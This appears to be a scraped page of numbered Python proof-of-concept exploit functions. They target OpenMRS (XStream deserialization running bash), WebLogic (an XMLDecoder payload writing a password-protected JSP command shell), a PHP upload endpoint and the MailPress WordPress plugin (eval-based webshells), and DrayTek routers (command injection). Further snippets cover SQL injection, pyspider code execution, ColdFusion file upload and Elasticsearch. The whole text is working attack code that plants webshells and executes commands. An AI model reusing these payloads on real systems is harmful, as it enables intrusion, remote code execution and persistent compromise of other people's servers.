        data += "-----------------------------24464570528145--\r\n"

        header = {
            "User-Agent":
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36",
            "Content-Type":
            "multipart/form-data; boundary=---------------------------24464570528145"
        }
        req.post(url, headers=header, data=data)

        file_path = "/cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/" + filename
        file_url = urljoin(self.url, file_path)
        response = req.get(file_url)
        if content in response.content:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url
            result['VerifyInfo']['Shell'] = file_url

        return self.parse_output(result)
Exemple #24
0
def poc(url):
    proxy = {}
    ressource = "/openmrs/ws/rest/v1/concept"
    burp0_url = url + ressource
    burp0_headers = {"Content-Type": "application/xml"}
    try:
        r = req.post(burp0_url,
                     headers=burp0_headers,
                     proxies=proxy,
                     verify=False,
                     allow_redirects=False)
        if r.status_code == 500:
            while True:
                try:
                    burp0_url = url + ressource
                    burp0_headers = {"Content-Type": "text/xml"}
                    burp0_data = "<map>\r\n  <entry>\r\n    <jdk.nashorn.internal.objects.NativeString>\r\n      <flags>0</flags>\r\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\r\n        <dataHandler>\r\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\r\n            <is class=\"javax.crypto.CipherInputStream\">\r\n              <cipher class=\"javax.crypto.NullCipher\">\r\n                <initialized>false</initialized>\r\n                <opmode>0</opmode>\r\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\r\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\r\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\r\n                    <next class=\"java.lang.ProcessBuilder\">\r\n                      <command>\r\n                        <string>/bin/bash</string>\r\n                        <string>-c</string>\r\n  \t\t\t<string>{echo," + command_str + \
                                 "}|{base64,-d}|{bash,-i}</string>\r\n                      </command>\r\n                      <redirectErrorStream>false</redirectErrorStream>\r\n                    </next>\r\n                  </iter>\r\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\r\n                    <method>\r\n                      <class>java.lang.ProcessBuilder</class>\r\n                      <name>start</name>\r\n                      <parameter-types/>\r\n                    </method>\r\n                    <name>foo</name>\r\n                  </filter>\r\n                  <next class=\"string\">foo</next>\r\n                </serviceIterator>\r\n                <lock/>\r\n              </cipher>\r\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\r\n              <ibuffer></ibuffer>\r\n              <done>false</done>\r\n              <ostart>0</ostart>\r\n              <ofinish>0</ofinish>\r\n              <closed>false</closed>\r\n            </is>\r\n            <consumed>false</consumed>\r\n          </dataSource>\r\n          <transferFlavors/>\r\n        </dataHandler>\r\n        <dataLen>0</dataLen>\r\n      </value>\r\n    </jdk.nashorn.internal.objects.NativeString>\r\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\r\n  </entry>\r\n  <entry>\r\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\r\n  </entry>\r\n</map>"
                    r = req.post(burp0_url,
                                 headers=burp0_headers,
                                 data=burp0_data,
                                 proxies=proxy,
                                 verify=False,
                                 allow_redirects=False)
                    if r.status_code == 500:
                        m = re.search('(java.util.HashMap)', r.text)
                        if m:
                            return True
                        else:
                            return False
                    else:
                        break
                except KeyboardInterrupt:
                    break
        else:
            return False
    except:
        return False
Exemple #25
0
 def _verify(self):
     result = {}
     headers = {
         "User-Agent": "Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0",
         "Accept-Charset": "GBK,utf-8;q=0.7,*;q=0.3",
         "Content-Type": "text/xml"
     }
     payload = '''
             <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext
             xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder">
             <void class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/0bxxl42slk.jsp</string>
             <void method="println"><string><![CDATA[<%   if("hobs7p".equals(request.getParameter("pwd"))){
                 java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
                 int a = -1;
                 byte[] b = new byte[2048];
                 out.print("flag:m36ty4jg");
                 while((a=in.read(b))!=-1){
                     out.println(new String(b));
                 }
             } %>]]></string></void><void method="close"/>
             </void></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
         '''
     try:
         if '://' not in self.url:
             self.url = 'http://' + self.url
         url_1 = self.url + '/wls-wsat/CoordinatorPortType11'
         req.post(url_1, data=payload, headers=headers, timeout=5)
         url_2 = self.url + '/bea_wls_internal/0bxxl42slk.jsp?pwd=hobs7p&i=whoami'
         resp = req.get(url_2, timeout=5)
         if resp.status_code == 200 and 'flag:m36ty4jg' in resp.content:
             result['VerifyInfo'] = {}
             result['VerifyInfo']['URL'] = self.url
             result['VerifyInfo']['Webshell'] = self.url + '/bea_wls_internal/0bxxl42slk.jsp?pwd=hobs7p&i=whoami'
             result['VerifyInfo']['Response'] = resp.content[13:38]
     except Exception as e:
         print(e)
     return self.parse_attack(result)
Exemple #26
0
def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/hotels/booking?execution=e1s2'
    try:
        res = req.post(url,
                       data=poc_str,
                       verify=False,
                       timeout=5,
                       headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response
Exemple #27
0
def poc(url):
    if not url.startswith("http"):
        url = "http://" + url
    if "/" in url:
        url += '/users?page=&size=5'
    try:
        res = req.post(url,
                       data=poc_str,
                       verify=False,
                       timeout=5,
                       headers=headers)
        response = res.text
    except Exception:
        response = ""
    return response
Exemple #28
0
    def _attack(self):
        result = {}
        url = urlparse.urljoin(
            self.url,
            'index.php?do=ajax&view=upload&file_type=big&filename=filename')
        shell = "Ra<?php $e = $_REQUEST['e'];$arr = array($_POST['pass'],);array_filter($arr, base64_decode($e));?>"

        # 在本地新建一个文件
        f = open('s.php', 'wb+')
        f.write(shell)
        f.flush()
        f.close()

        #上传文件
        f = open('s.php', 'rb')
        files = [('filename', ('php.php', f, 'jpg'))]
        resp = req.post(url, files=files)

        # 删除本地刚创建的文件
        f.close()
        os.remove('s.php')

        # 匹配上传后的路径,并访问该路径验证是否上传成功
        match = re.findall(r'"(data\\\/uploads\\\/.*?\.php)"', resp.content)
        if match:
            url = urlparse.urljoin(
                self.url, '/' + match[0].replace('\\', '') + '?e=YXNzZXJ0')
            head = {'Content-Type': 'application/x-www-form-urlencoded'}
            data = {'pass': '******'}
            resp = req.post(url, headers=head, data=data)
            if resp.status_code == 200 and 'poctest' in resp.content:
                result['FileInfo'] = {}
                result['FileInfo']['Fileame'] = url
                result['FileInfo']['Content'] = shell

        return self.parse_output(result)
Exemple #29
0
def set_new_upload_path(host, path):
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'X-Requested-With': 'XMLHttpRequest', }
    data = {
        "setting_id": "general",
        "BasicConfigOptions.workDir": path,
        "BasicConfigOptions.proxyHost": "",
        "BasicConfigOptions.proxyPort": "80"}
    resp = req.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers)
    if "successfully" in resp.content:
        return True
    else:
        print("[-] Change New Upload Path failed")
        exit(resp.content)
Exemple #30
0
def poc(url):
    a = False
    url = str(url)[7:]
    url = "http://" + url + ":9200/_search?pretty"
    try:
        res = req.post(url,
                       data=poc_str,
                       verify=False,
                       timeout=5,
                       headers=headers)
        #print res.status_code
        res1 = req.post(url,
                        data=poc_str1,
                        verify=False,
                        timeout=10,
                        headers=headers)
        response = res.text
        #print response
        response1 = res1.text
        if "2500" in response1 and "uid=" in response:
            a = True
    except Exception:
        response = ""
    return a
Exemple #31
0
def check_accurate(ip,port):
    '''
    accurate check
    check if python script can be executed
    '''
    url="http://"+ip+":"+str(port)+"/debug/pyspidervulntest/run"
    headers={"Content-Type": "application/x-www-form-urlencoded"}
    data='''
    webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print('pyspidervulnerable')&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D
    '''
    try:
        r=req.post(url=url,data=data,headers=headers,timeout=1)
        if  '"logs": "pyspidervulnerable\\n"' in r.text:
            return True
    except Exception:
        return False
    return False
Exemple #32
0
 def run_cmd(self, cmd):
     try:
         headers = {
             "UserAgent":
             "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0"
         }
         url = self.url + "/cgi-bin/mainfunction.cgi"
         data = "action=login&keyPath=%27%0A%2fbin%2f" + cmd + "%0A%27&loginUser=a&loginPwd=a"
         res = req.post(url=url,
                        data=data,
                        timeout=(10, 15),
                        headers=headers)
         if res.status_code == 200:
             return res.text
         else:
             return ""
     except Exception as e:
         return ""
Exemple #33
0
    def _verify(self):
        result = {}
        vul_url = self.url + '/celive/live/header.php'
        payload = {
            'xajax':
            'LiveMessage',
            'xajaxargs[0][name]':
            "1',(SELECT 1 FROM (select count(*),concat("
            "floor(rand(0)*2),(select md5(233)))a from "
            "information_schema.tables group by a)b),"
            "'','','','1','127.0.0.1','2') #"
        }

        response = req.post(vul_url, data=payload, timeout=30).content
        if 'e165421110ba03099a1c0393373c5b43' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = vul_url

        return self.parse_attack(result)
Exemple #34
0
    def _attack(self):
        result = {}
        flag = ''.join([random.choice(string.digits) for _ in range(8)])
        flag_hash = hashlib.md5(flag).hexdigest()
        exp_url = "wp-content/plugins/mailpress/mp-includes/action.php"
        post_data = {
            'action':'autosave',
            'id':'0',
            'revision':'-1',
            'to_list':'1',
            'subject':'<?php echo md5('+flag+'); @eval($_REQUEST[shell]);?>',
            'mail_format':'standard',
            'autosave':'1'
        }

        tmpparse = urlparse.urlparse(self.url)
        if tmpparse.path != '':    
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc + '/' + tmpparse.path.split('/')[1]
        else:
            self.url = tmpparse.scheme + '://'+ tmpparse.netloc
        
        vul_url = self.url + '/' + exp_url
        base_rep = req.post(vul_url,data=post_data)
        getid = re.findall(r'<autosave id=\'[\d]*\'',base_rep.content,re.I)
        tmpid = getid[0].split("'")[1]
        
        while int(tmpid) > 0:
            shell_url = self.url + '/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id='+tmpid
            rep = req.get(shell_url)
            
            if flag_hash in rep.content:

                result['ShellInfo'] = {}
                result['ShellInfo']['URL'] = shell_url
                result['ShellInfo']['Content'] = '@eval($_REQUEST[c1tas]);'
            
            break
            

        return self.parse_output(result)